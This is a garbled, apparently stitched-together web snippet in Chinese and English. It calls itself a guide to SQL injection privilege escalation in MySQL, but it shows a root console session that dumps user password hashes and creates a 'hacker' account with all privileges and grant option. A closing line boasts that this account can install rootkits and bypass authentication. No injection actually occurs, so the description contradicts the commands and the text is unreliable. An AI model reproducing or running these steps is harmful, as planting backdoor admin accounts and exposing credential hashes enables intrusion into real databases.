mysqld是MySQL数据库的一个重要组成部分,在进行数据库开发中启动 This guide provides information on how to conduct a SQL injection attack to perform privilege escalation in MySQL databases. The goal is to enable the database driver user to increase their account’s privileges beyond its default rights.
$ mysql -u root -pEnter password:Welcome to the MySQL monitor. Commands end with ; or \g.Your MySQL connection id is 22Server version: 5.5.58-0+deb8u1 (Debian)Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or itsaffiliates. Other names may be trademarks of their respectiveowners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql>SHOW GRANTS FOR current_user();+--------------------------------------------------------------+| Grants for root@localhost |+--------------------------------------------------------------+| GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT || OPTION |+--------------------------------------------------------------+1 row in set (0.00 sec)mysql>SELECT User, Password FROM mysql.user WHERE User LIKE '%';+-----------+-------------------------------------------+| User | Password |+-----------+-------------------------------------------+| root | *A15C201711B011F7231BAE4FEF4F342C197E99FA || driver | *A49C987051307BB8C2A244A21EEBD5965A3997C0 || | |+-----------+-------------------------------------------+2 rows in set (0.00 sec)mysql>INSERT INTO mysql.user (Host,User,Password) VALUES ('localhost','hacker','*2D3647067158E8C86FE056E5AB5D5C3F5108948F');Query OK, 1 row affected (0.00 sec)mysql>GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'localhost' WITH GRANT OPTION;Query OK, 0 rows affected (0.02 sec)
当执行以上命令时,hacker用户将可以获得所有特权,并能够使用root帐户执行所有操作,包括安装rootkits并绕过身份验证。
